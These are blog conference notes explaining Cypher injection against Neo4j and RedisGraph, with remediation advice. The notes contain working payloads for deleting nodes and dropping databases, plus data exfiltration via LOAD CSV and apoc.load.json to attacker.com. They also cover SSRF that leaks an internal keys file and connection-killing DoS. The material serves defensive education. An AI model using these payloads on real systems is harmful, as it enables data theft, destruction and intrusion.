Sponsored by

Conference notes: Cypher Query Injection - the new “SQL Injection”

Posted in Conference notes on November 29, 2022

Conference notes: Cypher Query Injection - the new “SQL Injection”

Hi! This week’s conf’notes are from ‘Cypher Query Injection - the new “SQL Injection” we aren’t aware of’ by Noy Pearl at BSides TLV and BSides Orlando.


TL;DR

This in an excellent introduction to Cypher injection in graph databases like Neo4j. Noy Pearl breaks down everything from the basics to advanced exploitation, sharing her own research and a playground for practice.

Intro to Cypher & Graph Databases

What is Cypher?

  • Cypher is short for (Open) Cypher Query Language
  • It’s commonly used in Graph databases
Comments
  • Cypher is Neo4j’s graph query language that lets you retrieve data from the graph. It’s like SQL for graphs.
  • It was originally intended to be used with Neo4j, but was opened up through the openCypher project. It is now used by many other databases including RedisGraph, Spark, Amazon Neptune and SAP HANA Graph.
  • Cypher Query Language Reference, Version 9

What is a Graph database?

 Relational databaseGraph database
Vendor examplesMySQL, Microsoft SQL ServerNeo4j, RedisGraph, Amazon Neptune
What it looks likeTables, rows, columns: Graphs, nodes, relationships: )

Graph example:

What is a Cypher Query?

Terms:

Node, Relationship & Node:

Variable, Label & Property:

Query example:

  • MATCH and RETURN are the equivalent of SELECT FROM in SQL
  • Get all Characters:
MATCH (c:Character) RETURN
  • Get Character by name:
MATCH (c:Character)
WHERE c.name = 'Spongebob'
RETURN c

Cypher injection

Basic SQL injection

Vulnerable query

SELECT * FROM "characters" WHERE name = "Spongebob"

returns:

Injection
If name is based on user input, injecting Spongebob" OR 1=1-- will change the query to:

SELECT * FROM "characters" WHERE name = "Spongebob" OR 1=1--"

It’ll return:

Basic Cypher injections

MATCH By Name - Vulnerable query

MATCH (c:Character)
WHERE c.name = ' + USER_INPUT + ' RETURN c Spongebob

// E.g. return the node that has the name Spongebob:
MATCH (c:Character)
WHERE c.name = 'Spongebob' RETURN c

MATCH By Name injection - Return all
Injecting Spongebob' or 1=1 RETURN c// will change the query to:

MATCH (c:Character)
WHERE c.name = 'Spongebob' or 1=1 RETURN c//' RETURN c

which returns all nodes.

This is the equivalent of the previous SQL injection example.

Problem
In order to inject RETURN c, we need to know there is a variable called c (but more that in a sec).

MATCH By Name injection - Delete node
Vulnerable query:

MATCH (c:Character)
WHERE c.name = ' + USER_INPUT + ' RETURN c Spongebob

Injecting Spongebob' DELETE c//will change the query to:

MATCH (c:Character)
WHERE c.name ='Spongebob' DELETE c//' RETURN c

which deletes the node.

MATCH By Name injection - Delete everything
Vulnerable query:

MATCH (c:Character)
WHERE c.name = ' + USER_INPUT + ' RETURN c Spongebob

Injecting Spongebob' MATCH (all:Character) DELETE all// will change the query to:

MATCH (c:Character)
WHERE c.name = 'Spongebob'
MATCH (all:Character)
DELETE all//'
RETURN c

We inserted two clauses (MATCH & DELETE). This creates a variable called all to get all the nodes that have a label called Character, then deletes them.

Problem
In blackbox testing, we can’t see the query. So we don’t know that there is a label Character.
The solution is to leak this data by leveraging a legitimate Neo4j functionality called LOAD CSV:

Data exfiltration via LOAD CSV in Neo4j

Blind Cypher injection

  • We’re basically trying to exploit a blind Cypher injection, which is when we’re able to inject into a query but don’t see the reply

LOAD CSV

  • Used to import data from CSV files (possibly from external files)
  • Syntax: LOAD CSV FROM https://your-website/data.csv
  • Interesting because it sends a GET request to an external service (that we can define)
  • So it enables leaking data from the database to a server we control

Using LOAD CSV to leak Labels

Payload to leak all labels:

CALL db.labels() YIELD label
LOAD CSV FROM 'https://attacker.com/'+label
AS b RETURN b//

What this does:

  • Calls the procedure db.labels() which returns all labels in the database
  • Uses LOAD CSV & appends the label at the end of the URL. This sends a GET request to our server with the leaked label in the path (one request sent for each label):

Notice the User-Agent is NeoLoadCSV_Java.

Using LOAD CSV to leak Properties

We know there is a label called Character.
Payload to leak its properties:

MATCH (c:Character)
LOAD CSV FROM 'https://attacker.com/'+apoc.text.join(keys(c), '')
AS b RETURN b//

What this does:

  • Uses keys() to return all properties of nodes that have a label Character
  • Uses apoc.text.join to transform the list into a string (so we can append it at the end of the URL)
  • Uses LOAD CSV to send all the properties to your server (a GET request is sent for each property)

Using LOAD CSV to leak Values of a Property

We know there is a label called Character & a property called name.
Payload to leak the names (i.e. values of the property name):

MATCH (c:Character)
LOAD CSV FROM 'https://attacker.com/'+c.name
AS b RETURN b//

Attack escalation

Denial of Service - Preventing access to the database

Leak & Kill connections

  1. Call dbms.listConnections() to get all connection IDs:
CALL dbms.listConnections()
  1. Use LOAD CSV to leak them to your server
  2. Kill the connection with dbms.killConnection:
CALL dbms.killConnection("bolt-9276")
  1. Or kill a list of connections with dbms.killConnections:
CALL dbms.killConnections(["bolt-9276", "bolt-9273"])

Impact:

  • We’re killing the connections between the server and the database (it’s not a client-side attack).
  • So using an automated script, we could prevent queries of legitimate users from being executed, leading to DoS.
  • But it’ll depend on the role & permissions you have when injecting. If your role is admin, you’ll be able to perform this DoS attack with a simple injection with LOAD CSV.

Drop database

  1. List all databases:
SHOW databases
  1. Use LOAD CSV to leak their names to your server
  2. Drop databases:
DROP database spongebob

SSRF & RFI - Accessing sensitive endpoints & files

Leveraging LOAD CSV for SSRF

  • Cypher injection can be exploited for SSRF
  • By injecting LOAD CSV FROM <url-of-internal-server>, you can make the vulnerable server send requests to internal servers and access hidden endpoints, enumerate directories and files, leak data to your server, etc

Lateral movement in the cloud

  • Use LOAD CSV FROM to query the AWS metadata service to find out to which other machine(s) you can escalate your attack
  • If you can query the secret manager of AWS, you can also get a lot of sensitive files and passwords from that
  • But this only works in IMDSv1
  • IMDSv2 requires passing a session token via the HTTP request header X-aws-ec2-metadata-token, to allow queries to the AWS metadata service. Noy didn’t find a way to include this token in GET requests sent by LOAD CSV FROM.

Leak secrets through SSRF

Let’s say there is an internal endpoint that hosts a sensitive file:

Cypher injection can be exploited to leak the secret in this file:

LOAD CSV FROM "http://localhost:3030/internal-api/keys.txt"
AS secret
LOAD CSV FROM "http://attacker.com/"+secret[0]
AS LINE RETURN secret[0]//

What this does:

  • The first LOAD CSV FROM gets the secret file from the other server, and saves it as secret
  • The second LOAD CSV FROM sends a request to our server, with the request appended at the end

Note that:

  • This works even if the Neo4j database and the sensitive file are hosted on different servers
  • The filetype doesn’t matter (it doesn’t have to be CSV)

Responsible disclosure to Neo4j

  • Noy alerted Neo4j about the risks of having LOAD CSV enabled because there is no way to disable it
  • They’re working on a solution but it’s not simple: LOAD CSV is defined as a clause not a function, and it is not possible to disable clauses (while it is possible to disable functions)

Alternative to LOAD CSV

  • Neo4j APOC Library extends the functionality and Cypher language of Neo4j databases
  • It provides more features including procedures to Import / Load and Export data
  • apoc.load.json can be used if LOAD CSV is blocked to leak the same information:
MATCH (c:Character)
CALL apoc.load.json("https://attacker.com/data.json?leaked="+c.name)
YIELD value RETURN value//
  • This requires that APOC is installed in the database. Chances are it will be since APOC is considered the largest and most common Neo4j library

Remediation & Mitigation

Remediation

  • Use Parameterized Queries
// Not vulnerable (parameterized query)
session.run("MATCH (c:Character)
WHERE c.name = $name RETURN c", {name: name})

// Vulnerable (string concatenated with Cyper query)
session.run("MATCH (c:Character)
WHERE c.name '" + name + "' + RETURN c)

Mitigations

  • Neo4j supports RBAC - users, roles & privileges
    • Read / write
    • Built-in granular roles - PUBLIC, reader, editor, publisher, … admin
    • Revoke privileges from roles
    • Hardening capabilities per-user
  • Disable/blocklist Apoc procedures (like LOAD, IMPORT, EXPORT…) in neo4j.conf (since version 4.3)
  • Uninstall APOC if it’s not used

RedisGraph

  • Extension to Redis that enables writing Cypher queries
  • Supports some procedures (e.g. db.labels)
  • Supports substrings
  • No equivalent of LOAD CSV, but CASE WHEN can be used for Cypher injection (if-based, with OR 1=2)
    • E.g. get labels with db.labels and check wether the first letter equals ‘a’ (using OR 1=2 to get the result if it’s blind injection)
  • Supports parameterized queries
  • Doesn’t support RBAC

What now

  • Practice: cypher-playground
  • Fix existing injections in your apps & Reduce attack surface
  • Hunt for Cypher injection on bug bounty ptograms

Resources

Top